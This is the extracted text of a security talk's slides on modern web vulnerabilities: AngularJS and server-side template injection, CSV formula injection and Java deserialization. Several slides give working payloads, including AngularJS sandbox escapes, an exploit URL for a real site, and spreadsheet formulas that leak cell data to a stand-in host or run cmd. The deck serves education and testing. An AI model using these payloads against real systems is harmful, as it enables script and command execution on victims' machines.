![Page 1: Nguyen Phuong Truong Anh - Some new vulnerabilities in modern web application](https://reader035.vdocument.in/reader035/viewer/2022062218/587795721a28ab0f778b5d13/html5/thumbnails/1.jpg)
Some new vulnerabilities in modern web application
(Part 1)
hkln1 (@anh_npt)
![Page 2: Nguyen Phuong Truong Anh - Some new vulnerabilities in modern web application](https://reader035.vdocument.in/reader035/viewer/2022062218/587795721a28ab0f778b5d13/html5/thumbnails/2.jpg)
Xin cảm ơn các nhà tài trợ
![Page 3: Nguyen Phuong Truong Anh - Some new vulnerabilities in modern web application](https://reader035.vdocument.in/reader035/viewer/2022062218/587795721a28ab0f778b5d13/html5/thumbnails/3.jpg)
AngularJS Template Injection (Client-site template injection)
![Page 4: Nguyen Phuong Truong Anh - Some new vulnerabilities in modern web application](https://reader035.vdocument.in/reader035/viewer/2022062218/587795721a28ab0f778b5d13/html5/thumbnails/4.jpg)
What is AngularJS ?• Popular MVC JavaScript Framework• Maintained and recommended by Google• Read more: • https://docs.angularjs.org/tutorial
![Page 5: Nguyen Phuong Truong Anh - Some new vulnerabilities in modern web application](https://reader035.vdocument.in/reader035/viewer/2022062218/587795721a28ab0f778b5d13/html5/thumbnails/5.jpg)
What’s risk ? (1)
Not vulnerable
![Page 6: Nguyen Phuong Truong Anh - Some new vulnerabilities in modern web application](https://reader035.vdocument.in/reader035/viewer/2022062218/587795721a28ab0f778b5d13/html5/thumbnails/6.jpg)
What’s risk ? (2)
???
![Page 7: Nguyen Phuong Truong Anh - Some new vulnerabilities in modern web application](https://reader035.vdocument.in/reader035/viewer/2022062218/587795721a28ab0f778b5d13/html5/thumbnails/7.jpg)
Four general attack vectors1. Attacking the Sandbox2. Attacking the Sanitizer3. Attacking the CSP Mode4. Attacking the Codebase
![Page 8: Nguyen Phuong Truong Anh - Some new vulnerabilities in modern web application](https://reader035.vdocument.in/reader035/viewer/2022062218/587795721a28ab0f778b5d13/html5/thumbnails/8.jpg)
The payloads…• 1.0.1 - 1.1.5• {{constructor.constructor('alert(1)')()}}
• 1.2.0 - 1.2.1• {{a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getP
rototypeOf(a.sub),a).value,0,'alert(1)')()}}
• ….• 1.4.0 - 1.4.9• {{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//');}}
• 1.5.0-rc2 Fixed
![Page 9: Nguyen Phuong Truong Anh - Some new vulnerabilities in modern web application](https://reader035.vdocument.in/reader035/viewer/2022062218/587795721a28ab0f778b5d13/html5/thumbnails/9.jpg)
AngularJS injection in the wild (1)• https://hackerone.com/reports/125027
![Page 10: Nguyen Phuong Truong Anh - Some new vulnerabilities in modern web application](https://reader035.vdocument.in/reader035/viewer/2022062218/587795721a28ab0f778b5d13/html5/thumbnails/10.jpg)
AngularJS injection in the wild (2)• Check: https://developer.uber.com/docs/deeplinking?q=wrtz{{7*7}}• Response: wrtz49 Vulnerable
• Exploit: https://developer.uber.com/docs/deep-linking?q=wrtz{{(_="".sub).call.call({}[$="constructor"].getOwnPropertyDescriptor(_.__proto__,$).value,0,"alert(1)")()}}zzzz
![Page 11: Nguyen Phuong Truong Anh - Some new vulnerabilities in modern web application](https://reader035.vdocument.in/reader035/viewer/2022062218/587795721a28ab0f778b5d13/html5/thumbnails/11.jpg)
Demo• Piwik
![Page 12: Nguyen Phuong Truong Anh - Some new vulnerabilities in modern web application](https://reader035.vdocument.in/reader035/viewer/2022062218/587795721a28ab0f778b5d13/html5/thumbnails/12.jpg)
Reference• http://blog.portswigger.net/2016/01/xss-without-html-client-side-te
mplate.html• http://www.slideshare.net/x00mario/an-abusive-relationship-with-an
gularjs
![Page 13: Nguyen Phuong Truong Anh - Some new vulnerabilities in modern web application](https://reader035.vdocument.in/reader035/viewer/2022062218/587795721a28ab0f778b5d13/html5/thumbnails/13.jpg)
Server-site template injection
![Page 14: Nguyen Phuong Truong Anh - Some new vulnerabilities in modern web application](https://reader035.vdocument.in/reader035/viewer/2022062218/587795721a28ab0f778b5d13/html5/thumbnails/14.jpg)
What is template engine? (1)• Present dynamic data via web pages and emails.• Separation of presentation (HTML/CSS) from application logic.• Used in wikis, blogs, marketing applications and CMS.• Some template engines:• FreeMarker• Velocity• Smarty• Twig• Jade
![Page 15: Nguyen Phuong Truong Anh - Some new vulnerabilities in modern web application](https://reader035.vdocument.in/reader035/viewer/2022062218/587795721a28ab0f778b5d13/html5/thumbnails/15.jpg)
What is template engine? (2) <?php echo $param ?> <?php echo htmlspecialchars($var, ENT_QUOTES, ‘UTF-8’) ?>
{{ param }} {{ param | escape}} / {{ param | e}}
![Page 16: Nguyen Phuong Truong Anh - Some new vulnerabilities in modern web application](https://reader035.vdocument.in/reader035/viewer/2022062218/587795721a28ab0f778b5d13/html5/thumbnails/16.jpg)
What’s risk ?• Not only XSS Remote Code Execution (RCE)• Arbitrary object creation• Arbitrary file read/write• Remote file include• Information disclosure and privilege escalation
![Page 17: Nguyen Phuong Truong Anh - Some new vulnerabilities in modern web application](https://reader035.vdocument.in/reader035/viewer/2022062218/587795721a28ab0f778b5d13/html5/thumbnails/17.jpg)
Introduction (1)• $output = $twig->render("Dear {first_name},", array("first_name" =>
$user.first_name) ); Not vulnerable
• $output = $twig->render($_GET['custom_email'], array("first_name" => $user.first_name) ); ???
![Page 18: Nguyen Phuong Truong Anh - Some new vulnerabilities in modern web application](https://reader035.vdocument.in/reader035/viewer/2022062218/587795721a28ab0f778b5d13/html5/thumbnails/18.jpg)
Introduction (2)• custom_email={{7*7}} 49• custom_email={{self}} Object of class
__TwigTemplate_7ae62e582f8a35e5ea6cc639800ecf15b96c0d6f78db3538221c1145580ca4a5 could not be converted to string
![Page 19: Nguyen Phuong Truong Anh - Some new vulnerabilities in modern web application](https://reader035.vdocument.in/reader035/viewer/2022062218/587795721a28ab0f778b5d13/html5/thumbnails/19.jpg)
Template injection methodology
![Page 20: Nguyen Phuong Truong Anh - Some new vulnerabilities in modern web application](https://reader035.vdocument.in/reader035/viewer/2022062218/587795721a28ab0f778b5d13/html5/thumbnails/20.jpg)
Detect (1)• Plaintext context
smarty= Hello {user.name}Hello user1
freemarker= Hello ${username}Hello user1
any= <b> Hello </b><b> Hello </b>
smarty= Hello ${7*7}Hello 49
freemarker= Hello ${7*7}Hello 49
![Page 21: Nguyen Phuong Truong Anh - Some new vulnerabilities in modern web application](https://reader035.vdocument.in/reader035/viewer/2022062218/587795721a28ab0f778b5d13/html5/thumbnails/21.jpg)
Detect (2)• Code context
Personal_greeting = usernameHello user1
Personal_greeting = username<tag>Hello
Personal_greeting = username }} <tag>Hello user01 <tag>
![Page 22: Nguyen Phuong Truong Anh - Some new vulnerabilities in modern web application](https://reader035.vdocument.in/reader035/viewer/2022062218/587795721a28ab0f778b5d13/html5/thumbnails/22.jpg)
Identify
![Page 23: Nguyen Phuong Truong Anh - Some new vulnerabilities in modern web application](https://reader035.vdocument.in/reader035/viewer/2022062218/587795721a28ab0f778b5d13/html5/thumbnails/23.jpg)
Exploit• ‘For Template Authors’ - sections covering basic syntax.• ‘Security Considerations’ - chances are whoever developed the app
you're testing didn't read this, and it may contain some useful hints.• Lists of builtin methods, functions, filters, and variables.• Lists of extensions/plugins - some may be enabled by default.
![Page 24: Nguyen Phuong Truong Anh - Some new vulnerabilities in modern web application](https://reader035.vdocument.in/reader035/viewer/2022062218/587795721a28ab0f778b5d13/html5/thumbnails/24.jpg)
Payloads: Smarty (1)
![Page 25: Nguyen Phuong Truong Anh - Some new vulnerabilities in modern web application](https://reader035.vdocument.in/reader035/viewer/2022062218/587795721a28ab0f778b5d13/html5/thumbnails/25.jpg)
Payloads: Smarty (2)
![Page 26: Nguyen Phuong Truong Anh - Some new vulnerabilities in modern web application](https://reader035.vdocument.in/reader035/viewer/2022062218/587795721a28ab0f778b5d13/html5/thumbnails/26.jpg)
Payloads: Smarty (3)
![Page 27: Nguyen Phuong Truong Anh - Some new vulnerabilities in modern web application](https://reader035.vdocument.in/reader035/viewer/2022062218/587795721a28ab0f778b5d13/html5/thumbnails/27.jpg)
Payloads: Smarty (4)
![Page 28: Nguyen Phuong Truong Anh - Some new vulnerabilities in modern web application](https://reader035.vdocument.in/reader035/viewer/2022062218/587795721a28ab0f778b5d13/html5/thumbnails/28.jpg)
Payloads: Twig
![Page 29: Nguyen Phuong Truong Anh - Some new vulnerabilities in modern web application](https://reader035.vdocument.in/reader035/viewer/2022062218/587795721a28ab0f778b5d13/html5/thumbnails/29.jpg)
Payloads: Twig (Sandboxed)
![Page 30: Nguyen Phuong Truong Anh - Some new vulnerabilities in modern web application](https://reader035.vdocument.in/reader035/viewer/2022062218/587795721a28ab0f778b5d13/html5/thumbnails/30.jpg)
Payloads: Jade
![Page 31: Nguyen Phuong Truong Anh - Some new vulnerabilities in modern web application](https://reader035.vdocument.in/reader035/viewer/2022062218/587795721a28ab0f778b5d13/html5/thumbnails/31.jpg)
Payloads: FreeMarker
![Page 32: Nguyen Phuong Truong Anh - Some new vulnerabilities in modern web application](https://reader035.vdocument.in/reader035/viewer/2022062218/587795721a28ab0f778b5d13/html5/thumbnails/32.jpg)
Server-side template injection in the wild
• https://hackerone.com/reports/125980
![Page 33: Nguyen Phuong Truong Anh - Some new vulnerabilities in modern web application](https://reader035.vdocument.in/reader035/viewer/2022062218/587795721a28ab0f778b5d13/html5/thumbnails/33.jpg)
Demo• Flask/Jinja2• Alfresco
![Page 34: Nguyen Phuong Truong Anh - Some new vulnerabilities in modern web application](https://reader035.vdocument.in/reader035/viewer/2022062218/587795721a28ab0f778b5d13/html5/thumbnails/34.jpg)
Reference• http://blog.portswigger.net/2015/08/server-side-template-injection.h
tml• https://nvisium.com/blog/2016/03/09/exploring-ssti-in-flask-jinja2/• https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-pa
rt-ii
![Page 35: Nguyen Phuong Truong Anh - Some new vulnerabilities in modern web application](https://reader035.vdocument.in/reader035/viewer/2022062218/587795721a28ab0f778b5d13/html5/thumbnails/35.jpg)
Fomular Injection (CSV Injection)
![Page 36: Nguyen Phuong Truong Anh - Some new vulnerabilities in modern web application](https://reader035.vdocument.in/reader035/viewer/2022062218/587795721a28ab0f778b5d13/html5/thumbnails/36.jpg)
What is CSV Injection ?• Exploit via the export functionality that allow user to download CSV
(Excel) file.• Often contain input from untrusted sources such as survey responses,
transaction details, and user-supplied addresses, …• The attacker can execute any commands on user machine if web
application does not properly validate the contents of the CSV file.
![Page 37: Nguyen Phuong Truong Anh - Some new vulnerabilities in modern web application](https://reader035.vdocument.in/reader035/viewer/2022062218/587795721a28ab0f778b5d13/html5/thumbnails/37.jpg)
How to test?• =1 + 1 2• -2 + 3 1• +3 + 5 8
![Page 38: Nguyen Phuong Truong Anh - Some new vulnerabilities in modern web application](https://reader035.vdocument.in/reader035/viewer/2022062218/587795721a28ab0f778b5d13/html5/thumbnails/38.jpg)
The payloads…• =HYPERLINK(https://example.com?test=&A1&A2,”Error: please click
for further information”)
• =DDE(“cmd”;”/C calc”; “DdeLink_60_870516294”)
• =cmd | ‘ /C calc ‘ !A0
![Page 39: Nguyen Phuong Truong Anh - Some new vulnerabilities in modern web application](https://reader035.vdocument.in/reader035/viewer/2022062218/587795721a28ab0f778b5d13/html5/thumbnails/39.jpg)
CSV Injection in the wild
![Page 40: Nguyen Phuong Truong Anh - Some new vulnerabilities in modern web application](https://reader035.vdocument.in/reader035/viewer/2022062218/587795721a28ab0f778b5d13/html5/thumbnails/40.jpg)
Demo• Mangento Community
![Page 41: Nguyen Phuong Truong Anh - Some new vulnerabilities in modern web application](https://reader035.vdocument.in/reader035/viewer/2022062218/587795721a28ab0f778b5d13/html5/thumbnails/41.jpg)
Reference• https://www.owasp.org/index.php/CSV_Excel_Macro_Injection• https://hackerone.com/reports/72785• http://www.contextis.com/resources/blog/comma-separated-vulnera
bilities/
![Page 42: Nguyen Phuong Truong Anh - Some new vulnerabilities in modern web application](https://reader035.vdocument.in/reader035/viewer/2022062218/587795721a28ab0f778b5d13/html5/thumbnails/42.jpg)
Java deserialization vulnerability
![Page 43: Nguyen Phuong Truong Anh - Some new vulnerabilities in modern web application](https://reader035.vdocument.in/reader035/viewer/2022062218/587795721a28ab0f778b5d13/html5/thumbnails/43.jpg)
What is serialization ?
![Page 44: Nguyen Phuong Truong Anh - Some new vulnerabilities in modern web application](https://reader035.vdocument.in/reader035/viewer/2022062218/587795721a28ab0f778b5d13/html5/thumbnails/44.jpg)
What is serialization ? (2)
![Page 45: Nguyen Phuong Truong Anh - Some new vulnerabilities in modern web application](https://reader035.vdocument.in/reader035/viewer/2022062218/587795721a28ab0f778b5d13/html5/thumbnails/45.jpg)
More complex serialization… (1)
![Page 46: Nguyen Phuong Truong Anh - Some new vulnerabilities in modern web application](https://reader035.vdocument.in/reader035/viewer/2022062218/587795721a28ab0f778b5d13/html5/thumbnails/46.jpg)
More complex serialization… (2)
![Page 47: Nguyen Phuong Truong Anh - Some new vulnerabilities in modern web application](https://reader035.vdocument.in/reader035/viewer/2022062218/587795721a28ab0f778b5d13/html5/thumbnails/47.jpg)
Serialization in the context of Java web applications and application
servers• In HTTP requests – Parameters, ViewState, Cookies• RMI – The extensively used Java RMI protocol• RMI over HTTP – Many Java thick client web apps use this• JMX• Custom Protocols
![Page 48: Nguyen Phuong Truong Anh - Some new vulnerabilities in modern web application](https://reader035.vdocument.in/reader035/viewer/2022062218/587795721a28ab0f778b5d13/html5/thumbnails/48.jpg)
What’s problems ?• What if we knew of an object that implemented a “readObject”
method that did something dangerous ?• What if instead of appending an exclamation point to a user defined
string ?
![Page 49: Nguyen Phuong Truong Anh - Some new vulnerabilities in modern web application](https://reader035.vdocument.in/reader035/viewer/2022062218/587795721a28ab0f778b5d13/html5/thumbnails/49.jpg)
How to identify wherever an application might be vulnerable ?
![Page 50: Nguyen Phuong Truong Anh - Some new vulnerabilities in modern web application](https://reader035.vdocument.in/reader035/viewer/2022062218/587795721a28ab0f778b5d13/html5/thumbnails/50.jpg)
Java deserialization vulnerability in the wild• http://artsploit.blogspot.com/2016/01/paypal-rce.html
![Page 51: Nguyen Phuong Truong Anh - Some new vulnerabilities in modern web application](https://reader035.vdocument.in/reader035/viewer/2022062218/587795721a28ab0f778b5d13/html5/thumbnails/51.jpg)
Analysis of exploiting the real cases – Jboss application (1)
1. Identify
![Page 52: Nguyen Phuong Truong Anh - Some new vulnerabilities in modern web application](https://reader035.vdocument.in/reader035/viewer/2022062218/587795721a28ab0f778b5d13/html5/thumbnails/52.jpg)
Analysis of exploiting the real cases – Jboss application (2)
1. Exploit
![Page 53: Nguyen Phuong Truong Anh - Some new vulnerabilities in modern web application](https://reader035.vdocument.in/reader035/viewer/2022062218/587795721a28ab0f778b5d13/html5/thumbnails/53.jpg)
Demo
![Page 54: Nguyen Phuong Truong Anh - Some new vulnerabilities in modern web application](https://reader035.vdocument.in/reader035/viewer/2022062218/587795721a28ab0f778b5d13/html5/thumbnails/54.jpg)
Analysis of exploiting the real cases – Jenkins
application (1)1. Vulnerability Detection
![Page 55: Nguyen Phuong Truong Anh - Some new vulnerabilities in modern web application](https://reader035.vdocument.in/reader035/viewer/2022062218/587795721a28ab0f778b5d13/html5/thumbnails/55.jpg)
Analysis of exploiting the real cases – Jenkins
application (2)1. Vulnerability Detection
![Page 56: Nguyen Phuong Truong Anh - Some new vulnerabilities in modern web application](https://reader035.vdocument.in/reader035/viewer/2022062218/587795721a28ab0f778b5d13/html5/thumbnails/56.jpg)
Analysis of exploiting the real cases – Jenkins
application (3)1. Vulnerability Detection
![Page 57: Nguyen Phuong Truong Anh - Some new vulnerabilities in modern web application](https://reader035.vdocument.in/reader035/viewer/2022062218/587795721a28ab0f778b5d13/html5/thumbnails/57.jpg)
Analysis of exploiting the real cases – Jenkins
application (3)2. Exploit Development
![Page 58: Nguyen Phuong Truong Anh - Some new vulnerabilities in modern web application](https://reader035.vdocument.in/reader035/viewer/2022062218/587795721a28ab0f778b5d13/html5/thumbnails/58.jpg)
Analysis of exploiting the real cases – Jenkins
application (3)2. Exploit Development
![Page 59: Nguyen Phuong Truong Anh - Some new vulnerabilities in modern web application](https://reader035.vdocument.in/reader035/viewer/2022062218/587795721a28ab0f778b5d13/html5/thumbnails/59.jpg)
Analysis of exploiting the real cases – Jenkins
application (3)2. Exploit Development
![Page 60: Nguyen Phuong Truong Anh - Some new vulnerabilities in modern web application](https://reader035.vdocument.in/reader035/viewer/2022062218/587795721a28ab0f778b5d13/html5/thumbnails/60.jpg)
Analysis of exploiting the real cases – Jenkins
application (4)2. Exploit Development
![Page 61: Nguyen Phuong Truong Anh - Some new vulnerabilities in modern web application](https://reader035.vdocument.in/reader035/viewer/2022062218/587795721a28ab0f778b5d13/html5/thumbnails/61.jpg)
Analysis of exploiting the real cases – Jenkinsapplication (5)2. Exploit Development
![Page 62: Nguyen Phuong Truong Anh - Some new vulnerabilities in modern web application](https://reader035.vdocument.in/reader035/viewer/2022062218/587795721a28ab0f778b5d13/html5/thumbnails/62.jpg)
Demo
![Page 63: Nguyen Phuong Truong Anh - Some new vulnerabilities in modern web application](https://reader035.vdocument.in/reader035/viewer/2022062218/587795721a28ab0f778b5d13/html5/thumbnails/63.jpg)
Reference• https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websph
ere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/• http://www.slideshare.net/frohoff1/appseccali-2015-marshalling-pick
les• https://www.youtube.com/watch?v=VviY3O-euVQ